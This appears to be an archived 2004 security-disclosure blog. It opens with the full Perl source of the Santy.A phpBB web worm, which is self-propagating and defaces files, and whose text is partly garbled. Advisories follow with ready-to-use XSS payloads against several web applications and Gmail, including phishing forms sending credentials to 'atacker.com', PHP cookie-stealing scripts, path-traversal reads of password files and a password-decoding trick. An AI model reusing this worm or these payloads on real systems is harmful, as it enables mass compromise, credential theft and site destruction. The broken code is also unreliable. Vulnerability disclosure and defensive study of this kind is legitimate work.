Santy.A Web Worm Source Code (PoC) and pach

Wednesday, December 22, 2004


if you are afected... how to pach your web here:


Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
   for($i = 0; $i < sizeof($words); $i++)
   {


and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
   for($i = 0; $i < sizeof($words); $i++)
   {


Please inform as many people as possible about this issue. If you're a hosting provider
please inform your customers if possible. Else we advise you implement some level of
additional security if you run ensim or have PHP running cgi under suexec, etc.

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

######################################################
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)
# Date : 22/12/2004
# Solution : Upgrade to phpBB version 2.0.11
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# ~~ For educational purpose ~~
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.k-otik.com/news/20041221.phpbbworm.php
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#######################################################
!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print
q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName)
. ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName)
. ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all'
. '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000))
.
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif
width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012"
.
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i
or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub Pay Load() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/ ');
for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}



Workboard input validation error in task_id variable and proyect_id variable

Friday, December 17, 2004

#########################################
Work board input validation error in
task_id variable and proyect_id variable
let´s remote users to make XSS attacks
vendor: http://www.burnwave.com/modules.php? name=
Archives&op=info&did=15

Developer: Michael Squires
vendor notified: yes(msn conversation) xploit include: yes
original advisore:http://lostmon.blogspot.com/2004/12
/workboard-input-validation-error-in.html
OSVDB ID:12504
secunia:SA13574
##########################################


WorkBoard is a project/task manager used for primarily for software development
(in this case, PHP... but it can be used for non-software projects).
this script have two imput validation erros and a remote user can conduct
Cross-site scripting attacks (XSS)

the flaw was on 'project_id' variable


http://[target]/modules.php?name=WorkBoard&file=
project&project_id=3[XSS_code]

http://[target]/modules.php?name=WorkBoard&file=project&project_id=
2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+
lostmon+was+here+%3AD%3C/h1%3E

and the same flaw afected 'task_id' variable


http://[target]/modules.php?name=Work_Board&op=
Task&task_id=7[XSS_code]
http://[target]/modules.php?name=Work_Board&op=
Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+
XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

i`m speaking whith the developer by msn conversation....
but he is no interesed to fix it ????
:///

atentamente

Lostmon (lostmon@gmail.com)


thnx to estrella to be my ligth

thnx to all who belibed in me




--

La curiosidad es lo que hace mover la mente.



=============================================

conversation whith the developer by MSN


==================================================

No interest to fix ??? :O


X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:
hello !
Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

Yes?

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

helo you are the developer of

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

workboard ?

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

yes, I am.

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

okis i have found 2 poible faws

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

in your work

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

in 2 variables

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

unfortunately I do NOT support my free scripts

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

thanks for reading

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

if you want an updated version of workboard, go to nukescripts.net.

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

thanks

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

no like toi see ?



No se pudo entregar el mensaje siguiente a todos los destinatarios:

no like toi see ?





--
la curiosidad es lo que hace mover la mente

POSIBLE FIX

for variable proyect_id

search: $project_id = intval($project_id);


change for:

case "Project":

$project_id = intval($project_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$project_id";


for variable task_id

search: $task_id = intval($task_id);


change for:

case "task":

$task_id = intval($task_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$task_id";


Bug found : Lostmon (lostmon@gmail.com)

FIX by Lmc , by suko http://spanishwebmaster.com


Atentamente
Lostmon (lostmon@gmail.com)
thnx to Suko & Lmc

Disclosure on Froogle php script and setup.php unauthorice access

Tuesday, December 14, 2004

############################################
disclosure on Froogle php script by http://www.68designs.com/
target: froogle script version 1.0
vendor url: http://www.68designs.com/kb/link.php?id=5
impact: disclosure of instalation path .unauthoriced access
Xploit include: yes vendor informed :yes
OSVDB ID:12481
Secunia:SA13504
Securitytracker:1012553
############################################

Froogle script is a php web base script for adding in a ecomerce suit or store
and manage easy the Froogle´s account or offert products from Froogle.

In a defaults instalations this script need for install a file caled 'setup.php'
(no authentication is needed for run the script) any user can call
this file and reinstall the aplication in certs cases or obtain
administrative access to the aplication.
proof of concept :

http://[target]/froogle_path/setup.php
http://[target]/froogle/setup.php?option=step1
http://[target]/froogle/setup.php?option=step2

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who believed in me

Securitytracker url: http://securitytracker.com/alerts/2004/Dec/1012553.html

--
La curiosidad es lo que hace mover la mente....

variable 'file' in Blog Torrent 'btdownload.php' imput validation error(cross-site scripting)

Tuesday, December 07, 2004
####################################
variable 'file' in Blog Torrent 'btdownload.php'
imput validation error(cross-site scripting)
vendor : www.blogtorrent.com/
http://sourceforge.net/tracker/index.php?func=detail&aid=1080615&group_id=109524&atid=654202
Preview Version 0.8
vendor notified: yes exploit included:yes
impact:execute javascriptcode,remote file inclusion.
remote command execution.
OSVDB ID:12250 , 12251
Securitytracker:1012452
####################################



Blogs torrent is a web php script for managing
torrent links and users fron the blog and other options...

Variable 'file' in Blog Torrent 'btdownload.php'have and input
validation error and permits insert javascripts and execute code
and remote file inclusion, remote command execution Vulnerability

froof of concept :

get cookie session:

http://[target]/bittorrent_module/btdownload.php?
file=<script>alert(document.cookie)</script>



http://[target]/bittorrent_module/btdownload.php?
file=<script>document.write(document.cookie)</script>



insert content :


http://[target]/bittorrent_module/btdownload.php?

file=<img%20src=http://www.google.es/images/logo_sm.gif>


insert remote web :


http://[target]/bittorrent_module/btdownload.php?
file=<iframe%20src=http://www.google.es/></iframe>


insert remote data base:

http://[target]/bittorrent_module/btdownload.php?
file=<form%20action="http://www.atacker.com/savedb.php"%
20method="post">Username:<input%20name="username"%20type=
"text"%20maxlength="30">Password:<input%20name="password"
%20type="text"%20maxlength="30"><input%20name="login"%20
type="submit"%20value="Login"></form>



in sabedb.php i have query strings to save variables password

and username

sabedb.php obtain the cookie

<?

$archivo = 'tostada.txt';

$fp = fopen($archivo, "a");

$string = "$cookie";

$write = fputs($fp, $string);

fclose($fp);

?>

and save it into a txt

and save the user and password


<?php

mysql_db_query("passwordssss","insert into $usuario (usuario,pass)

values ('$usuario','$password')";

?>


whith this values what user put and sabe in a lite data base contains

only 2 tables password & username :)



disclosure username and password hash



http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=../data/users></iframe>

or

http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=http://[target]/torrent_blog/data/users></iframe>


download arbitraies files of the server or blog :



http://[target]/torrent_blog/btdownload.php?type=torrent&file=[path%file]

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../password.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../settings.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../login.php




securitytracker url: http://www.securitytracker.com/alerts/2004/Dec/1012452.html

atentamente

Lostmon (lostmon@gmail.com)


thnx to estrella to be my ligth

thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente...

zx issue repair form Gmail can bypass by equal simbol "="

Sunday, December 05, 2004
hello !!

After look this "bug"(http://securitytracker.com/alerts/2004/Nov/1012289.html)
and i look what are you making for correct this issue, and i happy this bug is solved
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2
Fscript%3E&fs=1

but this issue can repeat only ned a '=' symbol in url after 'zx' variablelike this:

Again Denial of service :/
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556[just here inser the simbol]%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1

http://gmail.google.com/gmail?search=cat&amp;cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556=%3Cscript%3Ealert(document.cookie)%3C
%2Fscript%3E&fs=1

and the bucle is repeating :-)

atentamente:
Lostmon (Lostmon@gmail.com)

thnx to estrella to be my ligth
thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente....

Denial of service On gmail account

Si un usuario tiene activa su cookie de Gmail podria
ser vulnenable a este tipo de atake ,en el cual podriamos
llegar hasta denegar el sevicio.


#######################################

Denial of service On gmail account

vendor url: http://gmail.google.com/

vendor notified:yes exploit included :yes

original advisore:http://lostmon.spymac.net/blog/

########################################




si un usuario tiene activa su cookie de ge mail podria ser

vulnenable a este tipo de atake ,en el cual podriamos llegar

hasta denegar el sevicio.



Asi un usuario mal intencionado podria crear una url mal intencionada y...

1- modificar o digamos engañar al usuario con una etiketa inexsitente:

http://gmail.google.com/gmail?search=cat&cat=[label_name]
&view=tl&start=0&zx=

como vemos el boton "remove label" nos muestra el titulo incluido en
[label_name] el cual puede no existir

2-Cross-site scripting:

la variable Zx no comprueba ni la longitud intrudicida ni si lo

introducido es correcto permintiendonos incluir codigo script para ser ejecutado.



http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=
8acabd2b173f0d81040559556[XSS-code]&fs=1

3- probocando una denegacion del servicio :)

al permitir la variable zx ejecusion de codigo cualkier codigo ke usemos hara que la variable fs se repita y repita y repita como resultado se obtendra una denegacion de servicio ya que el usuario no podra ver la pagina de gmail al estar "actualizando" cada vez :


http://gmail.google.com/gmail?search=cat&amp;amp;amp;amp;amp;amp;cat=etiketa&
view=tl&start=0&zx=18acabd2b173f0d81040559556%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1



atentamente

Lostmon (lostmon@gmail.com)

thnx to http://www.ayuda-internet.net for their support

Thnx to Rottew and ismax

Thx to estrella to be my ligth



La curiosidad es lo que hace mover la mente....


Gmail remote information disclosure



hello:


after found a bug in gmail ,i variable 'zx' few time ago i say gmail

reveal contact list to remote users,discloses account name,and gain

acces to account if cookie if active and whith some url can list

contacts labels or other information for sending to atacker´s web
site:

a situation o a proff of concept :


1 send a mail to gmail´s account information is the same...(not

spamming please :D)


2- in this email you send in html format and you can make two actions:


2.1 including code in html of this email (mail.html)

2.2 send a link and wait for users click on ...


if the gmails cookie if active and the user click on,any user can view

this information and can use it or send to ther sites via web form

others


Sample of Mail.html


<html>

<head>

<title>Gmail disclosure informatio Xploit</title>

<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

</head>

<body>

<table width="80%" border="0" align="center">

<tr>

<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="http://gmail.google.com/gmail?view=page&name=contacts&amp;ver="

></iframe>

</h5></td>

</tr>

<tr>

<td height="21"> <h5><strong>user&acute;s
name

account</strong><script>document.write(document.cookie)</script>

<iframe height="100%" id="iframe" width="100%"

frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="

></iframe>

</h5></td>

</tr>

<tr>

<td height="48"> <h5> user account options

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>

</h5></td>

</tr>

<tr>

<td height="48"><script>document.write(document.cookie)</script> </td>

</tr>

</table>

</body>

</html>


atentamente:

Lostmon (Lostmon@gmail.com)


--

La curiosidad es lo que hace mover la mente....

Multiples XSS vulnerability in Gfhost "Gmail hosting"

Friday, November 05, 2004


#############################################
###### Multiples XSS vulnerability in Gfhost
###### "Gmail hosting"
###### vendor Url:http://gfhost.mybesthost.com/
###### vendor notify: yes vendor respose : NO
####### xploit included: yes
#############################################


GFHost es un script que permite que uses tu cuenta de correo de Gmail para crear una página en la cuál se publicarán todos los archivos adjuntos de tus mensajes que esten guardados bajo algún label en tu cuenta de correo.De esta forma cualquier persona que visite tu página podrá descargar todos estos archivos.
Las categorías que están en la página generada por el programa son los labels que tengas en tu cuenta de correo, es decir, si en tu cuenta de correos tienes dos labels ("musica" y "videos") esas serán las categorías que están en tú página

posee una vulnerabilidad la cual permite tanto spofear el sitio atraves de Cross site scripting (XSS) ,asi mismo un usuario mal intencionado podria llegar a subir un archivo al hoting y desde el ejecutar funciones de php por ejemplo ,o realizar en si ataques de tipo XSS con el fin de obtener por ejemplo el usuario y el password de los usuarios incautos

son varios files los que permiten esta accion

y alguno de esos "xploits" podrias ser estos:

file label.php

http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=
http://www.atacker.com/save.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=
30%3E%3Cbr%3EPassword:%3Cinput%20name=password%20type=
text%20maxlength=30%3E%3Cbr%3E%3Cinput%20name=login%20type=
submit%20value=Login%3E%3C/form%3E%3C/body

file dl.php

http://[Target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=config.php


Podemos enviar un archivo a un a categoria determinada(anyfile.php)y despues
usar ese archivo enviado para ejecutar comandos.Los archivos se envian a User_name_account+"Label"@gmail.com

exaple of Anyfile.php

php code to get cookie

$archivo = 'tostada.txt';
$fp = fopen($archivo, "a");
$string = "\n $cookie";
$write = fputs($fp, $string);
fclose($fp);

script to include in the body
location.href="anyfile.php?cookie="+document.cookie+""



atentamente
Lostmon (lostmon@gmail.com)

Thank Ipy she is In my heart
Thanks to http://www.ayuda-internet.net (#Ayuda_Internet) for their support
and thx to Estrella to be my ligth.

--
La curiosidad es lo que hace mover la mente...

Google Local posee agujeros de tipo XSS


##################################################
Google local XSS vulnerability
os: win 2000 sp4 Ie 6.x whith all fixes
vendor url: http://www.google.es/lochp http://local.google.com/
original advisore: http://lostmon.spymac.net/blog/
###################################################

Google Local Te ayuda a buscar en una localizacion en concreto bien sea un provincia o pueblo ,un eterminado local o empresa o otros tipos de busquedas locales.Sin embargo posee alguna falla de seguridad (XSS) si intruducimos una palabra en el cuadro con la etiqueta "que" e introducimos
codigo html en el Form con la etiqueta "donde"este codigo sera ejecutado sin ningun problema.


Una demostracion de esta circunstancia o xploit:

http://www.google.es/local?hl=es&amp;lr=
&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW

EJEMPLO 1
http://local.google.com/local?hl=es&amp;amp;lr=&q
=lalala&near=%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+hacked
+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1%3E%3C%2Fp%3


E%3Cp%3ENo+les+abandones+%2C+ellos+no+lo+harian%3C%2Fp%3E%3C
img+src%3D%22http%3A%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2F
Gata_Misha_con_cria.jpg%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3
E&btnG=B%C3%BAsqueda

EJEMPLO 2



y pq no pedirle usuario y password al usuario incauto ???

http://local.google.com/local?hl=es&amp;amp;lr=&q=cafe
&near=%3Cbody%3E%3Cform%20action%3D%22http%3A%2
F%2Fwww.atacker.com%2Fsave2db.asp%22+method%3D%22
post%22%3EUsername%3A%3Cinput+name%3D%22username%
22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr
%3EPassword%3A%3Cinput+name%3D%22password%22+type%
3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput
+name%3D%22login%22+type%3D%22submit%22+value%3D%22Login
%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=B%C3%BAsqueda


EJEMPLO 3

securitytracker url: http://www.securitytracker.com/alerts/2004/Nov/1012081.html


Atentamente:

Lostmon (Lostmon@Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****

--
La curiosidad es lo que hace mover la mente....

A Dia de Hoy parece haber sido solucionada esta situacion 05/11/2004


XSS iN Goollery Gmail script for view Photo Galery

##############################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################


Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.

Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.

#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################

http://[TARGET]/goollery/viewalbum.php?conversation_id=
ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

Escritura en pagina lo cual nos permitiria spofear el sitio...

http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=
ffee00b71f3931a&btopage=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

Atentamente:

Lostmon (Lostmon@Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****

OSVDB url: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=goollery

Securitytracker url: http://securitytracker.com/alerts/2004/Nov/1012062.html
--
La curiosidad es lo que hace mover la mente

Gmail suit deja ver el password codificado y este puede ser descodificado


Gmail Suit es una aplicacion que ofrece diferentes
utilidades para gmail y añade menus contextuales
a nuestro explorer para poder tanto consultar como enviar
correos a gmail desde dicha suit

Gmail suit una vez instalado deja en la carpeta de usuario

(documents and settingsuser_nameApplication DataGSuit )
crea un archivo llamado settings.xml
si miramos dentro de este archivo vemos varios datos

User_name_login

ìïéóìáîå

1- el nombre de usuario de la cuenta de gmail
2- el password codificado de alguna manera

el password codificado tiene la misma longitud de caracteres
que el password en texto plano introducido por el usuario
faltaria saber como descodificarlo que seria tan sencillo como
pasar caracter por caracter a su valor ASCII (http://www.bbsinc.com/symbol.html)
restarle 128 y el resultado mirar en la tabla ASCII y tendremos el caracter
correcto del password

ejemplo:

ì=(236-128)=108 108 = l

otro caracter
á=(225-128)=97 97=a

caracter a caracter podriamos descodificar el password

ìïéóìáîå=loislane

securitytracker url: http://securitytracker.com/alerts/2004/Oct/1011994.html
OSVDB ID : 11176
atentamente:

Lostmon (lostmon@gmail.com)

Thank Ipy and [D]aRk You are The best friends
Thanks to http://www.Ayuda-Internet.net (#Ayuda_Internet) for support
and thx to Estrella to be my ligth.

--
La curiosidad es lo que hace mover la mente....

NEW RELEASE GSuite R14 DATE 30-10-2004
http://kb.imspire.com/support/2004-11-A.html

Gmail deja ver la lista de contactos a un usuario local


Gmail deja ver la lista de contactos a un usuario local

Procedimiento:


Abrimos nuestro navegador, y vamos a la web Http://Gmail.google.com
y tenemos acceso a nuestra cuenta.Escribimos nuestros correos, las actividades y cerramos el navegador,o nuestra sesión, es igual. inmediatamente abrimos a nuestro explorador de Windows, los archivos temporales de Internet y tomamos los archivos temporales de Gmail. Copiamos estos archivos en una carpeta, y entonces con el notepad abrimos los archivos del siguientes:



  • gmail[1]

  • gmail[2]

  • gmail[3]

  • etc.

    Uno de estos archivos contiene la lista con todos nuestros contactos, y cualquiera usuario,mirando nuestros ficheros temporales en esta PC, podría tener acceso y ver a los contactos de nuestros gmail

    atentamente

    Lostmon (lostmon@gmail.com )

    Thanks to LuTRiZiA always in my mind
    Thanks to http://www.ayuda-internet.net(#Ayuda_Internet) for support
    and thx to Estrella to be my ligth.

    La curiosidad es lo que hace mover la mente...


    Gmail drive deja ver el nombre de usuario y da acceso a la cuenta de correo


    Ante la avalancha de gente que usa la nueva funcionalidad para gmail

    gmail drive (http://www.viksoe.dk/code/gmail.htm)

    Se ha descubierto que un usuario local podria obtener el nombre de usuario con el que se inicio sesion en el disco siva a mi pc , mira las propiedades del disco de Gmail y en la etiqueta de volumen estara el nombre de usuario que inicio sesion en el disco...


    Si ademas marcamos la opcion de "auto login" un usuario local ademas podria abrir el navegador, dirigirse a la direccion http://gmail.google.com y al estar ya logeado en el Gmail drive ..seria automaticamente redirigido hacia la cuenta de correo del usuario



    Atentamente

    Lostmon ( lostmon@gmail.com )

    OSVDB ID 10940
    http://www.securitytracker.com/alerts/2004/Oct/1011758.html

    thx to www.Ayuda-Internet.net for their support
    thx to Ghalician he is whith me and investigate :)

    La curiosidad es lo que hace mover la mente....

    Virus/malware activo por las redes de IRC


    Ante la oleada de infeciones producidas por un virus/malware activo en la red de Irc-Hispano,y otras redes, desde #ayuda_internet ,
    preocupados por esta infección, que cada dia se esta extendiendo mas ,
    decidimos investigar cual podria ser la causa de la situacion e intentar
    llegar cuanto antes a una solucion rapida y eficaz para el usuario que visita la red.

    Asi os exponemos hoy el resultado de ese análisis o de esa investigación
    para asi ...en conocimiento de todos intentemos por lo menos ,no quedar
    infectados o si lo estubiesemos intentar desinfectarnos cuanto antes.

    Analisis de la situación:

    Los que sois asiduos al canal os habreis dado cuenta de que
    ultimamente nuestro bot banea muy seguido a una serie de usuarios que
    hacen spam por privado...

    El motivo no es otro que intentar protegeros de la amenaza de ese
    virus ..el "modus operandi" de ese virus es el siguiente:

    Entran usuarios con un nick aleatorio a una red de irc ,entran en un
    canal o varios y dejan por privado o por el general una url ,el usuario
    incauto que clica en ellas,y descarga el programa malware y lo ejecuta
    queda infectado.

    =============================
    url "capturadas" son estas:
    =============================
    http://hotgirl.such.info If you love amateurs... real amateurs, this
    is the best site on the net. Don't wait another second for these porn star wannabe's! CLICK HERE NOW -your ***** will thank you!

    http://hardporn.be.tf The most provocative and fantastic ,high tempo
    hard porn,fliery *****ing scenes,school girls,crazy lolitas all of them
    are in this web

    http://smssend.tr.gs Text Message anyone worldwide free with
    International SMS Messaging No signup required..! iF you want to send
    only click this site..!

    http://newmp3s.gen.ms Click Here! Free Downloads AZ, Full Mp3 Albums,
    New Mp3 Albums ..

    http://freemp3.here.ws Do you want to Listen All of the Singer's New
    album and New SingLes..? aLso it Ýs free..! only click This Site..!
    Full albums and a Lot of mp3 Free..!

    ===========================================================

    Despues de hacer un seguimiento de las webs e intentar "ver" el
    motivo por el cual puede pasar esto y que referencia tiene con esas
    webs ,nos damos cuenta de que todas las url llevan a una misma web
    desde la cual se descargan archivos con doble extension

    La web donde llevan es a esta http://cyprusturk.net/porn/
    web que guarda en ese directorio varios archivos exe para descargar,
    dependiendo del dominio desde el que se venga algunos ejemplos son estos :




    asiavideo.mpeg.exe
    sex.mpeg.exe
    good.mp3.exe
    real.mp3.exe


    Lleva a muchos mas con diferentes nombres y diferentes primeras
    extensiones,es algo deliverado ,pues se incluye en el exe el icono perteneciente a la extension mpeg o mp3 con lo cual el usuario mediano llegaria a ejecutar esa "pelicula" o ese "mp3" y entonces es cuando el exe es desempaquetado y instalado.Por el analisis de algunas de esos archivos llegamos a la siguiente informacion :

    ********************************************************************
    FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
    ********************************************************************

    File: C:Do*****ents and
    SettingsadministradorEscritoriohispanogood.mp3.exe
    Date: 13/09/2004 17:47:29

    ***** General ******************************************************
    Location: C:Do*****ents and SettingsadministradorEscritoriohispano
    Size: 4823545
    Version: 1.6.0.0
    CRC-32: 9F6F50FC
    MD5: CE6CD747A6C8A62334290EE8E85D5EBB
    Read only: No
    Hidden: No
    System file: No
    Directory: No
    Archive: Yes
    Symbolic link: No
    Time stamp: lunes, 13 de septiembre de 2004 17:24:36
    Creation: lunes, 13 de septiembre de 2004 17:03:02
    Last access: lunes, 13 de septiembre de 2004 17:43:28
    Last write: lunes, 13 de septiembre de 2004 17:24:36

    ***** Version ******************************************************
    Supported languages:: Inglés (Estados Unidos) (1033/1252)
    --- Version --------------------------------------------------------
    File version: 1, 6, 0
    Company name: instyler installation software
    Internal name: setup.exe
    Comments: www.instyler.com info@instyler.com
    Legal copyright: Copyright © 2000 Sebastian Brand
    Legal trademarks:
    Original filename: setup.exe
    Product name: instyler ex-it!
    Product version: 1, 6, 0
    File description: instyler ex-it! Self-Extractor
    Private build:
    Special build:

    ***** Resources ****************************************************
    --- Cursor ---------------------------------------------------------
    1
    2
    3
    4
    5
    6
    --- Bitmap ---------------------------------------------------------
    BBABORT
    BBALL
    BBCANCEL
    BBCLOSE
